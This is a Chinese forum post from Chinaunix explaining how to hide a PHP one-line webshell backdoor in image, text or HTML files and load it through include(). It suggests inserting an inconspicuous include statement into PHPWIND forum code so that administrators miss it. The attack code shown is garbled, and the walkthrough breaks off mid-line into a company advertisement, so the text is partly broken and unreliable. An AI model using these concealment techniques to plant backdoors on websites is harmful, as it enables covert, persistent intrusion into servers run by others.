免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
最近访问板块 发新帖
查看: 2470 | 回复: 0

[网络配置] 黑客隐藏 PHP 文件后门的技巧 [复制链接]

论坛徽章:
0
发表于 2017-06-13 16:45 |显示全部楼层
最近很多朋友都在问我是否能把我那一句话木马隐藏到HTML或图片里,其实把一句话木马插入到PHP文件中就已经很隐蔽了,如果说硬是要放到HTML文件
或图片里,就接着往下看的这篇测试报告吧。  

要知道如果光把PHP语句放到图片里是无论如何也不能执行的,因为PHP只解析扩展名为php的文件。所以说要能使隐藏在图片里的PHP语句执行。我们就
的借助PHP中的调用函数 :include 、require 等。   
  我们还记得前些日子把木马隐藏到图片的文章吧。也就是在PHP文件里用include("x.gif")这样的语句来调用隐藏在图片的木马语句。ASP中语句也
类似。看似非常隐蔽但直接调用图片对稍微懂
点PHP的人就不难发现可疑之处。由于URL 里用GET方式很难传递参数,这就使得插入木马的性能得不到发挥。  
  Include 函数在PHP中使用的比较频繁,所以引起的安全问题也实在太多,例如PHPWIND1.36的漏洞就是因为include后面的变量没做过滤引起的。由
此我们就可以构造类似的语句来插入到PHP文件
中。然后把木马隐藏到图片或HTML文件里,可以说隐蔽性就更高了。如在PHPWIND论坛里插入下面的语句:                     
     <‘’?@include includ/.$PHPWIND_ROOT;? >[Copy to clipboard]  

一般管理员是无法看出来的。  
  有了include 函数来辅助帮忙我们就可以把PHP木马隐藏到 诸如 txt、html和图片文件等很多类型的文件里来了。因为txt、html和图片文件这三种
类型的文件最无论在论坛还是文章系统里是最
为常见的了,下面我们就依次来做测试。  
  首先建立一PHP文件test.php 文件内容为:  
    CODE:$test=
[/url]

    公司主页:www.idczy.com
  公司名称: 深圳市兆恒科技资讯有限公司  
  E-Mail:445364186@qq.com
  联系人:夏先生 联系QQ:445364186
  联系电话:0755-25503040
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP